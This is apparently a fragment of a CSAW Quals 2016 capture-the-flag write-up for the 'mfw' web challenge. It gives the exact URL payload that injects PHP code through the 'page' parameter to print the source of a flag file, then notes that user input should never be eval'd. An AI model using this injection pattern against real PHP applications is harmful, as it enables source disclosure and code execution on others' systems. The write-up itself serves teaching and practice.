InfoSecIITR/write-ups/2016/csaw-quals-2016/web/mfw/README.md

 BTW, the URL to run that page was `http://web.chal.csaw.io:8000/?page=%27%20and%20die(show_source(%27templates/flag.php%27))%20or%20%27`

 Fun challenge overall :) Goes on to show that one should NEVER let user input be `eval`d in any way.
+[This stackoverflow answer](https://stackoverflow.com/questions/3115559/exploitable-php-functions) has a nice list of all the executable pathways in PHP.